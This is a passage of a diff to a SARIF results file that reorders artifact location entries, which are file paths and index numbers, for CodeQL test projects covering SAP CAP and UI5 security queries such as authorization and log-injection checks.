"location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 9 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 10 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 11 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 12 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 13 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 14 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 15 - } - }, { - "location" : { - "uri" : ".github/workflows/code_scanning.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 16 - } - }, { - "location" : { - "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 17 - } - }, { - "location" : { - "uri" : "codeql-workspace.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 18 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 19 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 20 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 21 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 22 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 23 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 24 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 25 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 26 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 27 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 28 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 29 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 30 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 31 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 32 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 33 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 34 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 35 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 36 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 37 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 38 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 39 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 40 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 41 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 42 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 43 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 44 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 45 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 46 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 47 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 48 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 49 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 50 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 51 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 52 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 53 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 54 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 55 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", - "uriBaseId" : "%SRCROOT%", - "index" : 56 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 57 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 58 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 59 } @@ -40501,13 +14315,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", "uriBaseId" : "%SRCROOT%", "index" : 62 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", "uriBaseId" : "%SRCROOT%", "index" : 63 } @@ -40525,13 +14339,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 66 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 67 } @@ -40555,37 +14369,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 71 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 72 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 73 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 74 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 75 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", "uriBaseId" : "%SRCROOT%", "index" : 76 } @@ -40609,13 +14423,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 80 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 81 } @@ -40645,19 +14459,19 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 86 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 87 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 88 } @@ -40675,37 +14489,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 91 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 92 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 93 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 94 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 95 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 96 } @@ -40717,73 +14531,73 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", "index" : 98 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 99 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 100 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 101 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 102 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", "index" : 103 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 104 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 105 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 106 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 107 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 108 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 109 } @@ -40795,37 +14609,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 111 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 112 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 113 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 114 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 115 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 116 } @@ -40843,37 +14657,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 119 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 120 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 121 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", "uriBaseId" : "%SRCROOT%", "index" : 122 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", "uriBaseId" : "%SRCROOT%", "index" : 123 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", "uriBaseId" : "%SRCROOT%", "index" : 124 } @@ -40915,25 +14729,25 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 131 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 132 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", "uriBaseId" : "%SRCROOT%", "index" : 133 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", "uriBaseId" : "%SRCROOT%", "index" : 134 } @@ -41107,31 +14921,31 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 163 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 164 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 165 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 166 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 167 } @@ -41173,19 +14987,19 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 174 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 175 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 176 } @@ -41197,49 +15011,49 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 178 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 179 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 180 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 181 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 182 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 183 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 184 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 185 } @@ -41251,55 +15065,55 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", "uriBaseId" : "%SRCROOT%", "index" : 187 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 188 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 189 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 190 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uri" : 